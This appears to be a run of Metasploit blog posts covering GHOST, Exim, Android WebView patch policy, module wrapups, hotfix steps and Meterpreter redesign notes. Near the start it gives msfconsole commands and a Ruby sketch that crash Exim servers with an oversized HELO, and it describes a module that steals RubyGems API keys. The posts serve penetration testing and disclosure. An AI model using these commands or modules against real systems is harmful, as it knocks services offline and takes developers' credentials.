
No, I Will Not Make A Ghost Pun


This week was marked -- some might say mauled -- by the news of another cutely-named vulnerability, GHOST. I'm sure it's a huge deal and justified all of the ballyhoo surrounding it, so I won't get into all that. If you're looking for some technical background, please see Michal Zalewski's excellent analysis.


Since we're in the exploit business, you can be sure I've spent a lot of time fielding questions about severity, ubiquity, and Metasploit coverage this week. We determined pretty early that Metasploit wasn't affected, like most software analyzed so far. So, that's one bullet dodged.


We also confirmed that Metasploit had no need to add an exploit for the publicly-disclosed Exim denial of service (DoS), since we've had one shipping for a little over four and a half years. The venerable SMTP fuzzer module will trip the condition with just a little bit of tweaking, like so:


msf> use auxiliary/fuzzers/smtp/smtp_fuzzer
msf> set STARTLEN 1239
msf> set CMD HELO
msf> set FuzzChar 0
msf> set RHOST
msf> run
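Under the hood, the module is just firing one long SMTP command and watching what comes back. A stripped-down Ruby sketch of the same idea (the method name, defaults, and return convention here are mine, not Metasploit's):

```ruby
require 'socket'

# Send a single oversized HELO, in the spirit of the fuzzer settings
# above, and return the server's reply (nil if the connection died).
# Method name and defaults are illustrative, not Metasploit API.
def fuzz_helo(host, port, fuzz_char: "0", len: 1239)
  sock = TCPSocket.new(host, port)
  sock.gets                                  # consume the 220 banner
  sock.write("HELO #{fuzz_char * len}\r\n")
  reply = sock.gets                          # a vulnerable server drops out here
  sock.close
  reply
end
```

Point it only at test servers you own.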


With that, you're off to hunt down and knock over all the unpatched, specially-configured, and somewhat old exim servers in your environment. They probably weren't doing anything important anyway. (Okay, only try this on a test network when you're trying to determine if your IDS/IPS is working, or if you have a mature Chaos Monkey style production environment).


As this is a library-level vulnerability, GHOST is not limited to merely old and weird versions of Exim. I'm sure a handful of software packages and embedded systems will turn out to be vulnerable to this. In fact, as of this morning, community contributor Christian FireFart Mehlmauer put up a pull request for a WordPress GHOST scanner, which is nice to have. That'll land in Framework this morning, I expect, after the usual code review.


That leaves the remote code execution angle. Of course, that's the only angle anyone really cares about, and it's the hardest nut to crack here. I believe Qualys's conclusion that this bug can lead to RCE... under certain, somewhat specialized circumstances. We kicked it around for a day or two here at Rapid7 and in the Metasploit Freenode channel. Turns out, popping shells with this bug is easier said than done. Maybe if we spent an extra 88 days on it, we'd be able to replicate the conditions required to get code execution. That said, interest in the open source security community seems pretty low.


I welcome all comers, of course. On the bright side, Qualys says they'll be releasing the Metasploit module "in the near future." Given all the constraints, I'm quite curious to see how they pulled it off, and I'm looking forward to their submission.


New Modules

We have two new modules since the last Weekly Wrapup was published. I've been waiting for a credential file stealer for literally years, and this week, Jonathan Claudius delivered. It's a post module that snarfs up your saved API key, used to publish gems, which is stored, in the clear, in a known location.


Unfortunately, the first version of this module used YAML.load to parse out the credential itself, which can be a Bad Thing. How ironic would that be? You pop the machine of a known Ruby developer (like, say, a Metasploit contributor), go for the RubyGems credential, and end up getting popped right back as soon as you parse your ill-gotten gains! The module was only live for about 13 hours with this security exposure, never shipped in Metasploit Pro or Community Editions or the Kali builds, and was caught the morning after by James egypt Lee. To me, this is a success story for open source code review -- our community and contributor base is highly engaged and puts a critical security eye on pretty much everything we write. It also points out that common programming practices, like using YAML.load to load YAML files (duh?), can lend themselves to security bugs, even when you're just using the normal, standard APIs.
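One way to see the hazard, sketched with a hypothetical booby-trapped credentials file (the object tag and key names are invented for illustration; Psych's safe_load rejects the arbitrary object tags that the historical YAML.load would happily instantiate):

```ruby
require 'yaml'

# A booby-trapped "credentials" document: instead of a plain string, an
# attacker plants a Ruby object tag. (Key and class here are illustrative.)
payload = "--- !ruby/object:OpenStruct\ntable:\n  :rubygems_api_key: pwned\n"

# Psych's safe_load only builds primitive types by default, so the
# object tag is rejected instead of being instantiated:
begin
  YAML.safe_load(payload)
rescue Psych::DisallowedClass
  puts "booby-trapped document refused"
end

# An honest credentials file still parses fine once the needed types
# (here, Symbol keys) are explicitly permitted:
creds = YAML.safe_load("---\n:rubygems_api_key: abc123\n",
                       permitted_classes: [Symbol])
puts creds[:rubygems_api_key]   # => abc123
```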

It's kind of a shame we didn't ship the exposure, since it'd be a fun, if dastardly, trick to pull at the Capture-The-Flag event at InfoSec Southwest this April here in Austin. (:


Auxiliary and post modules


Weekly Metasploit Wrapup

Posted by todb, Jan 23, 2015

McAfee ePO Vulnerability Disclosure

This week, we have another delightful exploit from our dear friend Brandon Perry, which targets McAfee's ePolicy Orchestrator. This bug was disclosed on the Full Disclosure mailing list on January 8, hit the Metasploit pull request queue on January 14, and was committed to the master branch of Metasploit Framework on January 18th, whereupon it got picked up by the Rapid7 Vulnerability and Exploit Database.


Knocking over security software is a special kind of win for any vulnerability researcher like Brandon, or us here at Rapid7, or really anyone. Why? Writing software of any complexity is hard. Writing software for a profit is also hard. Writing software that handles unknown user data is especially hard to pull off without introducing security vulnerabilities. Writing software that intentionally handles malicious and attacker-sourced data is insanely hard.


The fact that McAfee (or Rapid7, or Symantec, or anyone) is able to produce and sell enterprise-level security software at all is kind of a miracle, and I don't mean that negatively at all. People have been attacking McAfee-branded software for twenty years, and yet they only have 163 CVEs against their entire suite of past and current software. This is pretty amazing, and at the same time, a testament to Brandon and his ability to pick out a new (to the public) exploit path from a software company that's been training against the best security engineers in the world for so long. In addition, they reacted to Brandon's initial disclosure appropriately, with a quick turnaround on updating their knowledge base article with a workaround solution. So, a win all around, if you ask me.


Just to be clear, we stick to a pretty reasonable disclosure policy here at Rapid7 -- we give vendors and CERT/CC tens of days of heads up before public disclosure. Of course, if there's already an exploit out in the world, it's not like we're going to hold ours back; defenders, penetration testers, and researchers are best served by having reliable exploits at their disposal in order to make their customers, constituencies, and the Internet at large safer. The existence of publicly disclosed and discussed vulnerabilities is pretty crucial for the continued health of the Internet.


So, thanks Brandon, and McAfee, for providing a great example of things working out the right way.


Deprecations, Deprecations Everywhere

Just as a reminder, we're on track for a pile of deprecations in and around Metasploit in 2015. The most significant is dropping support for Ruby 1.9.x, in favor of 2.1.x, starting the first week of February. Ruby 1.9.x itself goes end-of-life near the end of February, so if you haven't cut over yet, you might want to prioritize that to shake out any forward compatibility issues.


The command line utilities msfcli, msfpayload, and msfencode will also be dropped in June, so if you rely on those for any automated processes, you're going to want to get more familiar with their replacements, msfconsole -X (or -r) and msfvenom.


New Modules

Since we last published, Metasploit has picked up four new exploits and five new auxiliary and post modules, including the above-discussed McAfee ePO XXE exploit.


The Arris command exec module by HeadlessZeke is pretty worrisome from a SOHO router perspective -- these Arris chipsets are all over the place under a lot of different brand names, and they are a) never patched, b) often shipped with backdoors, and c) pretty soft targets for bug hunters. If you're a penetration tester and have somehow managed to get some SOHO routers in scope on a real assessment, please tell me how you did it!


Exploit modules


Auxiliary and post modules

Hi folks! Sorry about the delay on this week's blog post. I've been responding to a few concerns about this week's Android revelations regarding Google's no-patch policy for nearly a billion in-use Android handsets, and, incidentally, caught a face cold that's been floating around Rapid7's delightful open-space office model. I'm back online and fully functional now, so I'll try to summarize here what I saw and responded to this week.


Pre-KitKat Android WebView Patches


If you somehow missed it, I published a blog post earlier this week about how Google is now telling vulnerability researchers (at least, a couple that I know) that they will no longer be providing WebView patches for pre-KitKat Android. This ended up getting some pickup from such esteemed media outlets as the Wall Street Journal, Forbes, and Taylor Swift, which generated a few thousand comments spread all over the Internet. I'll take a stab at summarizing the critical reaction here, and I promise I'm being sincere in characterizing these sentiments fairly. If I screw it up, please tell me.


OEMs don't patch anyway, so who cares?

It's true that the security patching for Android is, at best, quite broken. I wrote a post back in November about this issue, and this rejoinder is totally valid.


My problem, though, is that we're talking about two different things. One, Google is (now) not interested in working up patches for Android issues before KitKat (4.4), and two, downstream vendors are very slow to pick up patches from Google (if they ever do). The two are related, to be sure, but I don't think you can solve the latter problem without solving the former.


With the second problem, you can easily argue that downstream OEMs, carriers, and retailers are dropping the ball by not applying patches for old, publicly reported vulnerabilities. However, if Google isn't producing patches any more for shipping and for-sale devices, there's no longer even a ball for those OEMs to drop. More to the point, this change in attitude from Google makes it very easy for vendors to shrug and disclaim any responsibility for old vulns on their devices. You can argue this legally, ethically, technically or otherwise, and there's room for disagreement, but Google walking away from patches, in my mind, makes this state of affairs much worse.


Now, with all that said: Today, we can test this! We have two Metasploit modules shipping today that break the security model for pre-4.4 WebView: one is fixed upstream, and one remains unfixed. I'm /very/ interested in figuring out which, if either, of these vulnerabilities sees a downstream patch on pre-4.4 handsets. It's a pretty ideal test case, since they were discovered and reported so close to each other.


If you keep tabs on downstream devices and patch adoption versus patch creation, I would love to hear from you. Let's work together to see what the practical effects of this policy shift are.


Jelly Bean is legacy, so who cares?

While it's true that Jelly Bean is two named revisions back, and KitKat adoption is ticking up nicely, it's not like everyone gets to automatically upgrade for free. There are hardware costs, time and convenience costs, the carriers often limit choices or penalize customers for upgrading, people don't know how to upgrade, etc. There's a whole host of reasons, some good, some not, to stick to Jelly Bean.


Let's remember that Ice Cream Sandwich, Gingerbread, and Froyo together account for nearly 15% of tracked Android devices, and these are three, four, and five versions back! Heck, if I had an exploit that worked reliably on these phones, and I was the sort to go popping randoms who visit my evil website and snagging personal usernames and passwords, I'd be pretty thrilled to know that 15% of my target base is guaranteed vulnerable. After all, Windows XP accounts for about 18% of the total desktop market share today, and I know for a fact that there's an active criminal and government (and criminal government) marketplace for security bypasses on XP. 15% is good enough for plenty of shady applications.


Now, consider that Jelly Bean by itself accounts for nearly half (46%) of all Android phones. Add the way-downrev versions, and you're at well over half of all Android phones. So where 15% is good for bad guys, 60% is more than four times better -- and the value to attackers arguably grows faster than linearly with the install base.
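The back-of-the-envelope arithmetic behind those percentages, using the approximate dashboard figures quoted above:

```ruby
# Approximate Android version shares from Google's dashboard, early 2015
pre_jelly_bean = 0.15   # Froyo + Gingerbread + Ice Cream Sandwich combined
jelly_bean     = 0.46   # Jelly Bean alone

# Everything pre-KitKat falls outside Google's new WebView patch policy
legacy = pre_jelly_bean + jelly_bean
puts format("unsupported share: ~%.0f%%", legacy * 100)   # => ~61%
puts format("vs. the oldest set alone: %.1fx the targets",
            legacy / pre_jelly_bean)
```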


Consider, too, that WinXP went end-of-life for security patches 12 years after initial release. Google's apparent attitude shift about patching WebView became apparent only 2 years (technically, 28 months) after Jelly Bean's release.


WebView isn't part of the Android OS anymore, so who cares?

Yes, Google took a great leap forward by decoupling WebView from Android as of the Lollipop (5.0) release. I'm thrilled for this, and in five years, I expect the majority of in-use phones will be Lollipop or later.


In five years, we'll also be shaking our heads in bewilderment over all those people stuck on KitKat and below, thanks to the above-mentioned broken patch distribution model for handsets. Or not? I hope not. That's just too depressing to consider. Let's move on.


It's just WebView, not Jelly Bean, so who cares?

If I'm an attacker, and I had to choose one component of Android to focus my exploit efforts on, it'd be WebView, hands down. WebView is the one component that's used in virtually every ad-enabling library to remind me that I still don't care about Clash of Clans, and is used when you don't click "open link in browser" in every web-rendering app.


It's even used in the About Phone license page (which itself can lead to exploitation, thanks to some crafty keystrokes from friend-of-the-show Jgor).


The fact that Google will patch AudioPlayer, but not WebView, in a pre-4.4 context is frankly baffling. Why they would choose to abandon the best exploit vector an attacker has makes absolutely no sense to me.


I use Chrome, not AOSP Browser, so who cares?

Chrome (and other browsers, like Firefox and Dolphin) do not use the WebView component, so switching to one of these browsers for your day-to-day is a great mitigation step. If you're using the bundled AOSP browser on Jelly Bean or prior, stop it. If you're using your carrier's skinned browser, it's almost certainly using WebView as well, so stop that, too.


That said, though, the underlying WebView component is still exposed via apps and ad networks. Trend Micro took a look at a bunch of aftermarket browsing, messaging, and other apps, and found that many are still vulnerable.


And that's it..?

I really do hope that I've captured the criticism here accurately, in an (unironic) fair and balanced way. If I've misstated your favorite argument, or if you have another that I haven't captured here, please comment below, or pick a fight with me on Twitter.


New Modules

While I'll happily talk all day about Android security, this wrapup is intended to cover the changes in Metasploit over the last three weeks and change -- and since we celebrated HaXmas in there, it's a little outsized. We have 11 new exploits and 8 new auxiliary modules this week, for a total of 19 new usable modules to kick off 2015. Among those is, surprise, a new Cookie Theft module from Joe Vennix and Rafay Baloch that affects, double surprise, Android Jelly Bean. Will it be patched, ever?



Exploit modules


Auxiliary and post modules

Over the past year, independent researcher Rafay Baloch (of "Rafay Hacking Articles") and Rapid7's Joe Vennix have been knocking out Android WebView exploits somewhat routinely, based both on published research and original findings. Today, Metasploit ships with 11 such exploits, thanks to Rafay, Joe, and the rest of the open source security community. Generally speaking, these exploits affect "only" Android 4.3 and prior -- either native Android 4.3, or apps built with 4.3 WebView compatibility.


WebView is the core component used to render web pages on an Android device. It was replaced in Android KitKat (4.4) with a more recent Chromium-based version of WebView, used by the popular Chrome browser.


Despite this change, though, it's likely there will be no slow-down in these Android security bugs, and they will probably last a long time, due to a new and under-reported policy from Google's Android security team: Google will no longer be providing security patches for vulnerabilities reported to affect only versions of Android's native WebView prior to 4.4. In other words, Google is now only supporting the current named version of Android (Lollipop, or 5.0) and the prior named version (KitKat, or 4.4). Jelly Bean (versions 4.1 through 4.3) and earlier will no longer see security patches for WebView from Google, according to incident handlers on the Android security team.


Until recently, when there was a newly discovered vulnerability in Android 4.3, the folks at Google were pretty quick with a fix. After all, most people were on the "Jelly Bean" version of Android until December of 2013, and Jelly Bean's final release was just over a year ago, in October of 2013. This is why this universal cross-site scripting bug was fixed, as seen in the Android changelog and Rafay's blog, Rafay Hacking Articles.


Google on Patching pre-KitKat

However, after receiving a report of a new vulnerability in pre-4.4 WebView, Google's incident handlers responded with this:


If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves, but welcome patches with the report for consideration. Other than notifying OEMs, we will not be able to take action on any report that is affecting versions before 4.4 that are not accompanied with a patch.


So, Google is no longer going to be providing patches for 4.3. This is some eyebrow-raising news.


I've never seen a vulnerability response program that was gated on the reporter providing his own patch, yet that seems to be Google's position. This change in security policy seemed so bizarre, in fact, that I couldn't believe it was actually official Google policy. So, I followed up and asked for confirmation of what was told to the vulnerability reporter. In response, I got a nearly identical statement from the Android security team:


If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves but do notify partners of the issue[...] If patches are provided with the report or put into AOSP we are happy to provide them to partners as well.


When asked for further clarification, the Android security team did confirm that other pre-KitKat components, such as the multi-media players, will continue to receive back-ported patches.


Sorry, Jelly Bean, You're Too Old

Google's reasoning for this policy shift is that they "no longer certify 3rd party devices that include the Android Browser," and "the best way to ensure that Android devices are secure is to update them to the latest version of Android." To put it another way, Google's position is that Jelly Bean devices are too old to support -- after all, they are two versions back from the current release, Lollipop.


On its face, this seems like a reasonable decision. Maintaining support for a software product that is two versions behind would be fairly unusual in both the proprietary and open source software worlds; heck, many vendors drop support once the next version is released, and many others don't have a clear End-of-Life (EOL) policy at all. (An interesting side note: neither Google nor Apple has a published EOL policy for Android or iOS, but Microsoft and BlackBerry provide clear end-of-life and end-of-sale dates for their products.)


Most Android Devices Are Vulnerable

While this may be a normal industry standard, what's the situation on the ground? Turns out, the idea that "pre-KitKat" represents a legacy minority of devices is easily shown false by looking at Google's own monthly statistics of version distribution:



As of January 5, 2015, the current release, Lollipop, is less than 0.1% of the installed market, according to Google's Android Developer Dashboard. It's not even on the board yet.


The next most recent release, KitKat, represents about two fifths of the Android ecosystem. This leaves the remaining 60% or so as "legacy" and out of support for security patches from Google. In terms of solid numbers, it would appear that over 930 million Android phones are now out of official Google security patch support, given the published Gartner and WSJ numbers on smartphone distribution.


The Economics of Upgrading

Besides the installed base, I posit that the people who are currently exposed to pre-KitKat, pre-Chromium WebView vulnerabilities are exactly those users least likely to be able to "update to the latest version of Android" to get security patches. The latest Google Nexus retails for about USD$660, while the first hit for an "Android Phone" on Amazon retails for under $70. This is a nearly ten-fold price difference, which implies two very different user bases: one market that doesn't mind dropping a few hundred dollars on a phone, and one that will not or cannot spend much more than $100.


Taken together -- the two-thirds majority install base of now-unsupported devices, and the practical inability of that base to upgrade by replacing hardware -- this means that any new bug discovered in "legacy" Android is going to last as a mass-market exploit vector for a long, long time.


Here Come the Mass-Market Exploits

This is great news for penetration testers, of course; picking company data off of Android phones is going to be drop-dead easy in many, many cases, and I fully expect that handsets will be increasingly in-scope for penetration testing engagements. Unfortunately, this is great news for criminals for the simple reason that, for real bad guys, pretty much everything is in scope.


Open source security researchers routinely publish vulnerability details and working exploits with the expectation that this kind of public discussion and disclosure can get both vendors and users to take notice of techniques employed by bad guys. By "burning" these vulnerabilities, users come to expect that vendors will step up and provide reasonable defenses. Unfortunately, when the upstream vendor is unwilling to patch, even in the face of public disclosure, regular users remain permanently vulnerable.


Roll Your Own Patches?

It's important to stress that Android is, in fact, open source. Therefore, it's not impossible for downstream handset manufacturers, service providers, retailers, or even enthusiastic users to come up with their own patches. This does seem to happen today; a 4.3 vulnerability may affect, say, a Kyocera handset, but not a Samsung device with the "same" operating system.


While this is one of the core promises of open source in general, and Android in particular, it's impossible to say how often this downstream patching actually happens, how often it will happen, and how effective these non-Google-sourced patches will be against future "old" vulnerabilities.


The update chain for Android already requires the handset manufacturers and service carriers to sign off on updates that originate from Google, and I cannot imagine this process will improve now that Google itself has opted out of the patching business. After all, is AT&T or Motorola really more likely to incorporate a patch that comes from some guy on the Internet?


No Patches == No Acknowledgement

To complicate matters, Google generally does not publish or provide public comment on Android vulnerabilities, even when reported under reasonable disclosure procedures. Instead, Android developers and consumers rely on third party notifications to explain vulnerabilities and their impact, and are expected to watch the open source repositories to learn of a fix.


For example, Google's only public acknowledgement of CVE-2014-8609, a recent SYSTEM-level information disclosure vulnerability, was a patch commit message on the Lollipop source code repository. Presumably, now that Google has decided not to provide patches for "legacy" Android WebView, they will not be providing any public acknowledgement of vulnerabilities for pre-KitKat devices at all.


Please Reconsider, Google

Google's engineering teams are often the best around at many things, including Android OS development, so to see them walk away from the security game in this area is greatly concerning.


As a software developer, I know that supporting old versions of my software is a huge hassle. I empathize with their decision to cut legacy software loose. However, a billion people don't rely on old versions of my software to manage and safeguard the most personal details of their lives. In that light, I'm hoping Google reconsiders if (when) the next privacy-busting vulnerability becomes public knowledge.


The update (2014122301), which was released on December 23rd, 2014, failed to include files necessary for the application to update to version 4.11.0 for the first time.



The application will not start; the browser will therefore show a generic "The page can't be displayed" message when trying to load the web UI.

Additionally, various log messages may appear in the respective log files.

Windows: C:\metasploit\apps\pro\engine\prosvc.log

Linux: /opt/metasploit/apps/pro/engine/prosvc_stderr.log

/opt/metasploit/apps/pro/ui/lib/metasploit/pro/ui/common_configuration.rb:2:in `<top (required)>': uninitialized constant Metasploit::Pro::UI (NameError)

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require'

from /opt/metasploit/apps/pro/ui/lib/metasploit/pro/ui/engine.rb:1:in `<top (required)>'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require'

from /opt/metasploit/apps/pro/engine/config/application.rb:22:in `<top (required)>'

from /opt/metasploit/apps/pro/engine/lib/metasploit/pro/engine/command/base.rb:44:in `require'

from /opt/metasploit/apps/pro/engine/lib/metasploit/pro/engine/command/base.rb:44:in `require_environment!'

from /opt/metasploit/apps/pro/engine/lib/metasploit/pro/engine/command/base.rb:65:in `start'

from prosvc.rb:17:in `<main>'

Windows: C:\metasploit\apps\pro\ui\thin.log

Linux: /opt/metasploit/apps/pro/ui/log/thin.log

/opt/metasploit/apps/pro/ui/lib/metasploit/pro/ui/common_configuration.rb:2:in `<top (required)>': uninitialized constant Metasploit::Pro::UI (NameError)

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/polyglot-0.3.5/lib/polyglot.rb:65:in `require'

from /opt/metasploit/apps/pro/ui/config/application.rb:23:in `<top (required)>'

from /opt/metasploit/apps/pro/ui/config/environment.rb:2:in `require'

from /opt/metasploit/apps/pro/ui/config/environment.rb:2:in `<top (required)>'

from /opt/metasploit/apps/pro/ui/ `require'

from /opt/metasploit/apps/pro/ui/ `block in <main>'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/rack-1.4.5/lib/rack/builder.rb:51:in `instance_eval'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/rack-1.4.5/lib/rack/builder.rb:51:in `initialize'

from /opt/metasploit/apps/pro/ui/ `new'

from /opt/metasploit/apps/pro/ui/ `<main>'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/rack/adapter/loader.rb:33:in `eval'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/rack/adapter/loader.rb:33:in `load'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/rack/adapter/loader.rb:42:in `for'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/controllers/controller.rb:169:in `load_adapter'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/controllers/controller.rb:73:in `start'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/runner.rb:187:in `run_command'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/lib/thin/runner.rb:152:in `run!'

from /opt/metasploit/apps/pro/vendor/bundle/ruby/1.9.1/gems/thin-1.5.1/bin/thin:6:in `<top (required)>'

from /opt/metasploit/apps/pro/ui/scripts/ctl.rb:33:in `load'

from /opt/metasploit/apps/pro/ui/scripts/ctl.rb:33:in `start_thin'

from /opt/metasploit/apps/pro/ui/scripts/ctl.rb:47:in `<main>'

Affected Editions

Metasploit Pro, Express and Community.



The issue is only applicable if the application updated to version 4.11.0 between December 23rd, 2014 and January 7th, 2015. If the application updated to version 4.11.0 before or after these dates, and is currently running 4.11.0, it should not be affected by this issue.



On Linux:

1. Launch a Linux terminal via SSH or console

2. Stop Metasploit:

   /etc/init.d/metasploit stop

3. Change to your Metasploit installation directory, e.g.:

   cd /opt/metasploit

4. Create a hotfix directory:

   mkdir -p apps/pro/install/hotfix

5. Change to the hotfix directory:

   cd apps/pro/install/hotfix

6. Download the hotfix from Rapid7:


7. Extract the hotfix (substitute your installation directory as necessary):

   /opt/metasploit/common/bin/7za x metasploit-4.10.2-hotfix.7z

8. Install the hotfix (substitute your installation directory as necessary):

   /opt/metasploit/ruby/bin/ruby install.rb


On Windows:

1. Stop Metasploit:

   Start Menu -> Metasploit -> Services -> Stop

2. Open a Windows command prompt/shell as an administrator:

   Start Menu -> type cmd.exe -> right click cmd.exe -> click Run as administrator

3. Change to your Metasploit installation directory, e.g.:

   cd C:\metasploit

4. Create a hotfix directory:

   mkdir apps\pro\install\hotfix

5. Change to the hotfix directory:

   cd apps\pro\install\hotfix

6. Download the hotfix via your web browser:

   Save or move the hotfix to C:\metasploit\apps\pro\install\hotfix (substitute your installation directory as necessary)

7. Extract the hotfix (substitute your installation directory as necessary):

   C:\metasploit\ruby\bin\7za.exe x metasploit-4.10.2-hotfix.7z

8. Install the hotfix (substitute your installation directory as necessary):



The hotfix will take a few minutes to run and provides no output. You may see some warnings, which you can safely ignore.


After it completes, Metasploit will be automatically started.  Please wait 5 minutes and then access Metasploit in your browser:


Once logged in, you will need to update Metasploit to the latest version as you normally would.


12 Days of HaXmas: Wrapped!

Posted by todb, Jan 7, 2015

Wow, another 12-day blogging sprint in the can! This scheme to keep the Metasploit blog churning over the holidates always sounds like such a good idea in mid-December. By the time January rolls around... well, at least we got a ton of new blog posts for you to read as you ease back into the post-new-year grind of InfoSec. So, to close this thing out and to give you a reasonable place to find the HaXmas posts, please join me in song.


On the 12th day of HaXmas, my true love gave to me...

12 Meterpreter Mettles

11 Linux Migrations

10 Fingerprinting Frameworks

9 Android Exploits

8 Git client RCEs

7 Mildly Interesting Metasploit Stats


5 Blended Ducks

4 Password Bruteforcers

3 Jsobfus

2 Time Capsules

and an MS14-068


Even if the counts are complete fabrications, and the meter stumbles a little in the middle, you still cannot resist hearing the tune in your head. Happy New Year!

This post is the twelfth in a series, 12 Days of HaXmas, where we usually take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014. As this is the last in the series, let's peek forward, to the unknowable future.

Happy new year, it's time to make some resolutions. There is nothing like a fresh new year to get one's optimism at its highest.


Meterpreter is a pretty nifty piece of engineering, and full of useful functionality. The various extensions and delivery mechanisms can do amazing things that I am still trying to wrap my head around. But, there are other, more fundamental, parts of Meterpreter's design that are showing their age. The primary problems I have run into are that it's not terribly efficient and still a little unpredictable when stressed, the POSIX meterpreter is pretty tricky to build and leads to a lot of frustration, and testing is a somewhat manual, tribal-knowledge sort of process. Due to the high degree of integration between Meterpreter, its wire protocol (TLV) and Metasploit Framework, it can be difficult to make sure that all of the bells and whistles keep working, either in isolation or together, and difficult to track down the cause of a problem.


Luckily, my job is to make all of these things better this coming year! To this end, I have been spending my first month at Rapid7 experiencing all of the pain and joy of Meterpreter development. At the same time, I have been hatching plans to make Meterpreter an even more amazing tool. As part of this effort, I started working on an experimental tool that I'm calling 'mettle'. Mettle means to deal with difficulties in a spirited and resilient way. There also happens to be a cool-looking Marvel comic book character by that name. It is currently just something I am working on to scratch my second-system itch, but it tries to solve a few real problems with Meterpreter's design today.


If they can build it, they will come


First up, the POSIX build system for meterpreter has not seen as much love as the Windows version. It's understandable: working on Makefiles is not very sexy work, and there is nothing like a lot of technical debt in a build system to sap one's spirits. But they are important! So, the first leg of my project is to put together a build system that can work with multiple architectures, with cross-compilation and readability in mind. Rule number one is to require nothing fancy, just GNU make. Everything else can be built or bootstrapped. This is my top-level make file so far:




include scripts/make/Makefile.common
include scripts/make/Makefile.libev
include scripts/make/Makefile.libpcap
include scripts/make/Makefile.libressl
include scripts/make/Makefile.libtlv
include scripts/make/Makefile.kernel-headers
include scripts/make/


There is not a lot to see here - almost everything is in the include files. The point of this is to make the build system easier to understand by not including the kitchen sink in a single big file. This also makes merging changes from pull requests easier, since unrelated changes don't bleed into each other. Want to add a new library? It's one line here, and all of the goo goes somewhere else. When I experimented with several of the older PRs for meterpreter, all of them conflicted heavily with the big main Makefile, leading to a merge nightmare. Separated-out code is easier to merge and test, and helps prevent bit-rot.


The other thing to note is the addition of 'tools' and 'kernel-headers' makefiles. I'm working on building everything with a cross-compiler, notably the ELLCC compiler with the musl C library. ELLCC is an interesting project because it provides a single toolchain that not only targets many different platforms, but itself runs on those same platforms and more. Musl is a C library focused on security and simplicity. It also happens to still support Linux 2.4 kernels, which makes it interesting for 'run everywhere' software like Meterpreter. By using a cross-compiler, builds on my Ubuntu 14.04 system can generate the same binaries as your Fedora 20 system. But, you could also build them on OS X or Windows and get the same results. It also makes it possible to target other architectures and platforms later. I have an outer driver script that looks like this, just to keep things honest:



for i in armeb-linux-engeabi armeb-linux-engeabihf \
        arm-linux-engeabi arm-linux-engeabihf \
        mipsel-linux-eng mipsel-linux-engsf \
        mips-linux-eng mips-linux-engsf \
        ppc-linux-eng \
        i386-linux-eng x86_64-linux-eng; do
        echo Building target $i
        make TARGET=$i
done


Each of the builds is isolated into its own build tree, so you can keep them around and switch between them without having to 'make clean' first:


~/projects/mettle$ ls builds/
armeb-linux-engeabi  armeb-linux-engeabihf  i386-linux-eng  kernel-headers-3.12.6

~/projects/mettle$ ls builds/i386-linux-eng/
include  lib  libev  libpcap  libressl  share


I'm also keeping the source tarballs for the build in a separate repository to provide both a fast and reliable mirror for upstream sources. This removes dependency on upstream sources that may move, become unavailable, or might even be replaced.

~/projects/mettle/deps$ ls
ellcc-Mac_OS_X_10.9.5-0.1.6.tar.gz  kernel-headers-3.12.6.tar.xz  libpcap-1.6.2.tar.gz
ellcc-x86_64-linux-eng-0.1.6.tgz    libev-4.19.tar.gz             libressl-2.1.3.tar.gz


Separating out the pieces



I'm a big fan of separation of concerns and event-oriented programming. Modular code is simpler and easier to test because you can test each part in isolation. It also makes it easier to change one piece without affecting everything, because the interfaces are isolated and mockable. On that note, the core Meterpreter command dispatcher works something like this (simplified, but not by a lot):


The server_dispatch function runs in a loop, receiving packets from the control socket. A 'packet' in this case is really just a header followed by a command. Each packet is passed to command_handle, which then scans a command table of strings to find a pointer to a function that knows how to parse and operate on this kind of packet. In most cases, a new thread is created by command_handle, which is passed the function pointer and the packet. The packets are then passed to the handler function, which may be built into Meterpreter or dynamically loaded as part of an extension (usually the latter). While this design keeps the listening socket from blocking while a command is dispatched, it means that a post module like 'windows/gather/enum_services' translates into hundreds of threads spawned within Meterpreter. The lack of synchronization between these threads can also translate into stability problems, as a command sequence might be sent as 'open handle, close handle', but actually get executed in reverse.


This pass-through design also means that every layer of the stack has to understand the concept of a 'packet', how to parse it and how to generate responses directly back to the command socket. This makes it difficult to re-purpose the command handlers for a different API, like being hooked to a scripting language, or using a different type of wire format to communicate from the Metasploit framework.


To solve these problems, I am integrating an event loop into mettle's design that separates the command packet parsing from the callbacks, and moves the execution of the command handlers themselves into a separate thread. This design has several advantages.


First, there need to be only two threads at minimum: one to handle command ingress and egress, and another to actually execute the commands. More command dispatchers could be added for multiple channels into mettle.


Second, the packet parsing and generation will be separated out from the actual API calls. This will allow using the APIs from other sources, such as a built-in scripting language perhaps, or a different command format than TLV if desired.


Third, it allows commands to be run sequentially and synchronously without blocking the communications channels. Commands could even continue executing in the event of a disconnect from the command channel back to the Metasploit framework, and this design would be able to continue without any issues. It would behave similarly to how command dispatch works within the framework itself, supporting the concepts of queued commands and retries as well.


